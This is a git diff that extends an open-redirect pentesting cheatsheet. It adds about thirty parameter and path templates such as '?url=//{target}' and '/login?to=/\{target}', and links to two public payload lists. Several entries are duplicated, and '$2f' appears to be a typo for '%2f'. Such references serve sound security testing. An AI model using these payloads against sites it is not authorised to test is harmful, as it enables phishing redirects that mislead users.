diff --git a/cheatsheets/open-redirect.md b/cheatsheets/open-redirect.md index 6196923..459cc1b 100644 --- a/cheatsheets/open-redirect.md +++ b/cheatsheets/open-redirect.md @@ -24,7 +24,139 @@ //google.com/%2f.. ``` +## Possible open redirect parameters + +``` +?url=http://{target} +``` + +``` +?url=https://{target} +``` + +``` +?next=http://{target} +``` + +``` +?next=https://{target} +``` + +``` +?url=https://{target} +``` + +``` +?url=http://{target} +``` + +``` +?url=//{target} +``` + +``` +?url=$2f%2f{target} +``` + +``` +?next=//{target} +``` + +``` +?next=$2f%2f{target} +``` + +``` +?url=//{target} +``` + +``` +?url=$2f%2f{target} +``` + +``` +?url=//{target} +``` + +``` +/redirect/{target} +``` + +``` +/cgi-bin/redirect.cgi?{target} +``` + +``` +/out/{target} +``` + +``` +/out?{target} +``` + +``` +/out?/{target} +``` + +``` +/out?//{target} +``` + +``` +/out?/\{target} +``` + +``` +/out?///{target} +``` + +``` +?view={target} +``` + +``` +?view=/{target} +``` + +``` +?view=//{target} +``` + +``` +?view=/\{target} +``` + +``` +?view=///{target} +``` + +``` +/login?to={target} +``` + +``` +/login?to=/{target} +``` + +``` +/login?to=//{target} +``` + +``` +/login?to=/\{target} +``` + +``` +/login?to=///{target} +``` + + **Open Redirect Payloads** by @cujanovic https://github.com/cujanovic/Open-Redirect-Payloads + + +**Open Redirect Paramters** by @fuzzdb-project + +https://github.com/fuzzdb-project/fuzzdb/blob/master/attack/redirect/redirect-urls-template.txt